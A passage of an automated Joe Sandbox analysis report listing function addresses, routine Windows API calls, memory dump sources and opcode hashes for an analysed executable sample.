                                                                                                                                                                        • API ID: DestroyErrorLastWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1182162058-0
                                                                                                                                                                        • Opcode ID: f0ad9c29c52e60bb7efda88129449167d487413559162090f97bde00d75880e2
                                                                                                                                                                        • Instruction ID: 5d2a9e29958da36038f2a981cbb0e31f624763d618f989480d2932c281f6755d
                                                                                                                                                                        • Opcode Fuzzy Hash: f0ad9c29c52e60bb7efda88129449167d487413559162090f97bde00d75880e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21E4716101499BDB20AF19EC02BEA7798EB54320F000267FD14C7792D776EDA8DBE2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD0920 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CCFF30: LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
                                                                                                                                                                          • Part of subcall function 00CCFF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
                                                                                                                                                                          • Part of subcall function 00CCFF30: FreeLibrary.KERNEL32(00000000), ref: 00CD000F
                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00CD0964
                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CD096F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3032493519-0
                                                                                                                                                                        • Opcode ID: 4dd297c40533c3fbd3d6740645c116ca22431af9960af410c084cdf941ca13ef
                                                                                                                                                                        • Instruction ID: e8ad01b1df486c6453704f8356be4acea2aa8979a9e393778cdf04a826b812f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 4dd297c40533c3fbd3d6740645c116ca22431af9960af410c084cdf941ca13ef
                                                                                                                                                                        • Instruction Fuzzy Hash: 8DF0A03179521837F660219A5C43F27B68DD781B68F10427AFA88AB2C2ECD27C0A02D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D99F58 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,00D9A2DA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D99F8C
                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00D9A2DA,?,?,00000000,?,00000000), ref: 00D99FAA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2568140703-0
                                                                                                                                                                        • Opcode ID: ffa9342a4f02a6ff64209a6ce799bc0dc7c362ac47793de377cd9c4105838b66
                                                                                                                                                                        • Instruction ID: 93738023e28910be8ff9e5c7f8e201bebc3b2bed10653429a141e4d7c6e6a302
                                                                                                                                                                        • Opcode Fuzzy Hash: ffa9342a4f02a6ff64209a6ce799bc0dc7c362ac47793de377cd9c4105838b66
                                                                                                                                                                        • Instruction Fuzzy Hash: 29F0683240411ABBCF125F95DC159DEBE26EF48360B094114BA5865034CA36D871ABA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9820D Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D98223
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D9822E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                        • Opcode ID: eeb1d7fbd2cbfea53f2573623d2cb1ef18178e09be1c6ad46ddbe977aec3b883
                                                                                                                                                                        • Instruction ID: 7825d185d4ead13898e53e81d0f9eaed626d874e73e10c4de4fef6824d412897
                                                                                                                                                                        • Opcode Fuzzy Hash: eeb1d7fbd2cbfea53f2573623d2cb1ef18178e09be1c6ad46ddbe977aec3b883
                                                                                                                                                                        • Instruction Fuzzy Hash: 52E08C32100A14AFDF113BB6FE0CBA93A98EB42791F144021F608A60B0DF31989497B8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D81BAC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D84C57: FlsAlloc.KERNEL32(?,00D81BB6,00D81AB9,00D83D4F), ref: 00D84C85
                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81BCA
                                                                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D81BD5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocValue___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1208342256-0
                                                                                                                                                                        • Opcode ID: 5c7c39d293539027b5ec86b5f17bca194a250cc69877389a1dd5ecade7d1213a
                                                                                                                                                                        • Instruction ID: 3a8da5f8d32ec65b8961177d86b19837ee373990b54d7f1b6133dc3a8b8f5e7b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7c39d293539027b5ec86b5f17bca194a250cc69877389a1dd5ecade7d1213a
                                                                                                                                                                        • Instruction Fuzzy Hash: D7D0A9AC009302288C0833B2280289A238CE9037B47A0064AE020A61D2FE24A84FA332
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7F855 Relevance: 3.0, APIs: 2, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 00D7F85E
                                                                                                                                                                        • RtlEncodePointer.NTDLL(00000000,?,00D7F7E8,00000000,AtlThunk_AllocateData,00E97D78,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000), ref: 00D7F86D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressEncodePointerProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1846120836-0
                                                                                                                                                                        • Opcode ID: 763b1ef7a8a07eaf46d16c86a0ebef19c8532e62ded5001e2e1dd1d234e8ab95
                                                                                                                                                                        • Instruction ID: 14dbf2c4de208b45ec8f703b2e466312a8d1e47024a480d4786ac5fa66eb1cf2
                                                                                                                                                                        • Opcode Fuzzy Hash: 763b1ef7a8a07eaf46d16c86a0ebef19c8532e62ded5001e2e1dd1d234e8ab95
                                                                                                                                                                        • Instruction Fuzzy Hash: 17D092B5140308AFDF115FA6EC0899A3BA9BB5A7557009064F81D86621EB3398A6AA60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB6270 Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                        • Opcode ID: bb63c42784554585990b2d22bc52feb989ffc0d5879f7c41020d5ff4c201ddbf
                                                                                                                                                                        • Instruction ID: 2ffe21822f54ae771a7ad4cc45b84ff0e6f5f6c43819e45007bb34f9d7409e43
                                                                                                                                                                        • Opcode Fuzzy Hash: bb63c42784554585990b2d22bc52feb989ffc0d5879f7c41020d5ff4c201ddbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 75014931301121AFE6149B59DC89FAEF759EFD4321F20412DF310EB2D0CB616D118795
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D117F0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1b0ef8cda21a31e0da486c69ee36a29effcdb2eaf8e357b282a235c22b1f274a
                                                                                                                                                                        • Instruction ID: 06b8cecbf01ba430d3a752fbfb53f448c9f5e04190fa9b08d538093a868e3e4b
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b0ef8cda21a31e0da486c69ee36a29effcdb2eaf8e357b282a235c22b1f274a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0551B375600615AFC710DF69E894AAAB7B4FF05320F058269EE25DB261DB30ED45CBB0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9FB9E Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCPInfo.KERNEL32(E8458D00,?,00D9FDED,00D9FDE1,00000000), ref: 00D9FBD0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Info
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1807457897-0
                                                                                                                                                                        • Opcode ID: 914008185fc2599e7ba1e3e4ac8dcfb9921e0ea6dc1961ba3e0263cd0b0637cb
                                                                                                                                                                        • Instruction ID: 9dea6c4806e1bece1442e5b94a46124de2d1941ba357622a7c9dd82d8aeb7c55
                                                                                                                                                                        • Opcode Fuzzy Hash: 914008185fc2599e7ba1e3e4ac8dcfb9921e0ea6dc1961ba3e0263cd0b0637cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51477190425C9ADF218B28DD80AEA7BBCEB55304F2845FDE59AD7182C335AD46DB30
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D11950 Relevance: 1.6, APIs: 1, Instructions: 84synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,80004005,1FC3D414,?,?,00000000,?,?,00DA842D,000000FF,?), ref: 00D11962
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 24740636-0
                                                                                                                                                                        • Opcode ID: 3fe38a62257f6f1b7a921e662803fc558ff3244299bb8b2d02b2cdb4f3fcdc7a
                                                                                                                                                                        • Instruction ID: 174f9fd5ccdec01ab86442a3cd3f2a051c9df4b5a3b1ad31d515d9ca3b2823bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 3fe38a62257f6f1b7a921e662803fc558ff3244299bb8b2d02b2cdb4f3fcdc7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6521F3352006257FC6219F99E490A96F7A4FF15300B064125EF75AB612DF60EC91CBF0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD1B30 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CD1DA0: __Init_thread_footer.LIBCMT ref: 00CD1E16
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD1C10
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 984842325-0
                                                                                                                                                                        • Opcode ID: 1a858d59d8e6e2ed45b0f17a35dedeff0c73aba9521561a20863569ee13af1b8
                                                                                                                                                                        • Instruction ID: 7effb616bd9521960077425888dcabb11819b896a3228af3a0e2567583767566
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a858d59d8e6e2ed45b0f17a35dedeff0c73aba9521561a20863569ee13af1b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C310471584784FFEB24DF15EC82B49B7A0F740710F24061BEE556B7D0EBB169088B56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C28D40 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BC8CF0: EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8D2C
                                                                                                                                                                          • Part of subcall function 00BC8CF0: GetCurrentThreadId.KERNEL32 ref: 00BC8D40
                                                                                                                                                                          • Part of subcall function 00BC8CF0: LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8D7F
                                                                                                                                                                        • SetWindowLongW.USER32(?,00000004,00000000), ref: 00C28D8D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3550545212-0
                                                                                                                                                                        • Opcode ID: 797bd8ff73edc6352a322e185e7ca2a313648f44d66f805d65abca0b039958a3
                                                                                                                                                                        • Instruction ID: 9be3d88ad4fe2afed23b11cb497fdcce8f70f03551f7e6f3dee477770286b696
                                                                                                                                                                        • Opcode Fuzzy Hash: 797bd8ff73edc6352a322e185e7ca2a313648f44d66f805d65abca0b039958a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0A4326017226FC6319F68A844D2F7BECDF947A1B00882AF699D7151DB20DC0997B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB2170 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CB21E2
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
